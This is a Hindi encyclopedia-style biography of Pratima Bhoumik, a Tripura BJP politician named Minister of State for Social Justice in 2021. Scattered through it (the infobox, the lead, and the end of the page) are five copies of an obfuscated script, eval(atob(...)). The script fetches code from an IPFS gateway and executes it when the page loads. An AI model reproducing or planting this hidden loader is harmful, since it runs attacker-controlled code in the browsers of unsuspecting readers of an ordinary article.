प्रतिमा भौमिक
प्रतिमा भौमिक
| |
पूरा नाम | प्रतिमा भौमिक |
जन्म | 28 मई, 1969 |
जन्म भूमि | बारनारायण, सेपाहीजाला, त्रिपुरा |
अभिभावक | पिता- देबेन्द्र कुमार भौमिक माता- कानन भौमिक |
नागरिकता | भारतीय |
प्रसिद्धि | राजनीतिज्ञ |
पार्टी | भारतीय जनता पार्टी |
पद | राज्य मंत्री, सामाजिक न्याय और अधिकारिता मंत्रालय- 7 जुलाई, 2021 से |
शिक्षा | स्नातक (बायो-साइंस) |
विद्यालय | वीमेन कॉलेज, अगरतला, त्रिपुुरा विश्वविद्यालय, त्रिपुरा |
संबंधित लेख | नरेन्द्र मोदी का मंत्रिमण्डल, नरेन्द्र मोदी |
अद्यतन | 13:45, 21 जुलाई 2021 (IST) <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
|
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>प्रतिमा भौमिक (अंग्रेज़ी: Pratima Bhoumik, जन्म- 28 मई, 1969) भारतीय जनता पार्टी की राजनीतिज्ञ हैं, जिन्हें 7 जुलाई, 2021 को प्रधानमंत्री नरेन्द्र मोदी के मंत्रिमण्डल में विस्तार तथा फेरबदल के बाद 'सामाजिक न्याय और अधिकारिता मंत्रालय में राज्य मंत्री' बनाया गया है। केंद्रीय मंत्री के रूप में शपथ लेने के बाद प्रतिमा भौमिक ने इतिहास रच दिया है। भाजपा के टिकट पर 2019 में संसद के लिए चुने जाने के दो साल बाद प्रतिमा भौमिक ने केंद्रीय मंत्री के रूप में शपथ ली, ऐसा करने वाली वह पूर्वोत्तर राज्य त्रिपुरा की पहली स्थायी निवासी बन गईं।
परिचय
प्रतिमा भौमिक का जन्म 28 मई, 1969 को बारनारायण, सेपाहीजाला, त्रिपुरा में हुआ था।[1]
उनके पिता अध्यापक थे और उनके तीन भाई-बहन हैं। जीवन के शुरुआती दिनों में प्रतिमा भौमिक ब्लॉक, जिला और राज्य स्तर पर खो-खो की प्रतियगिताओं में खेला करती थीं। वह सोनमुरा के बरनारायण में अपने पैतृक स्थान पर खेती का अभ्यास भी करती थीं।[1]
प्रतिमा भौमिक के केंद्रीय मंत्री की शपथ लेने पर त्रिपुरा के मुख्यमंत्री बिप्लब कुमार देब ने अपनी खुशी जाहिर करते हुए फेसबुक पर पोस्ट लिखा, 'त्रिपुरा के लिए अत्यंत गौरव का क्षण है कि राज्य की नारीशक्ति की अग्रणी प्रतिनिधि प्रतिमा भौमिक जी प्रधानमंत्री नरेन्द्र मोदी के नेतृत्व वाली केंद्रीय मंत्रिपरिषद में शामिल हो गई हैं।' उन्होंने इसके लिए प्रतिमा भौमिक को बधाई भी दी।
राजनीतिक सफर
विज्ञान से स्नातक प्रतिमा भौमिक 1991 में भाजपा में शामिल हुई थीं। पार्टी में शामिल होने के एक साल बाद वह भाजपा राज्य समिति की सदस्य बनीं और अगले वर्ष उन्हें पार्टी के धनपुर मंडल का प्रमुख बनाया गया। प्रतिमा भौमिक ने पार्टी की युवा और महिला विंग की उपाध्यक्ष के रूप में भी काम किया। बाद में, 2016 में उन्हें पार्टी का महासचिव बनाया गया। उन्होंने 1998 और 2018 के विधानसभा चुनावों में त्रिपुरा के सबसे लंबे समय तक मुख्यमंत्री रहे माणिक सरकार को दो बार चुनौती दी लेकिन हार गईं। बाद में, उन्होंने 2019 के लोकसभा चुनावों में तत्कालीन सांसद शंकर प्रसाद दत्ता को 305,689 मतों के भारी अंतर से हराया।[1]
उनसे पहले, पश्चिम बंगाल से डॉ. त्रिगुणा सेन ने राज्यसभा में त्रिपुरा का प्रतिनिधित्व किया और भूतपूर्व प्रधानमंत्री इंदिरा गांधी के मंत्रिमंडल में शिक्षा और पेट्रोलियम मंत्री बने। असम के रहने वाले संतोष मोहन देव ने 1989 में पश्चिम त्रिपुरा निर्वाचन क्षेत्र से लोकसभा चुनाव लड़ा और पूर्व प्रधानमंत्री राजीव गांधी के मंत्रिमंडल में मंत्री बने।
|
|
|
|
|
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
टीका टिप्पणी और संदर्भ
- ↑ 1.0 1.1 1.2
प्रतिमा भौमिक (हिंदी) loksabhahindiph.nic.in। अभिगमन तिथि: 21 जुलाई, 2021। सन्दर्भ त्रुटि:
<ref>
अमान्य टैग है; "pp" नाम कई बार विभिन्न सामग्रियों में परिभाषित हो चुका है
संबंधित लेख
नरेन्द्र मोदी का कैबिनेट मंत्रिमण्डल
क्रमांक | मंत्री नाम | मंत्रालय |
---|
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>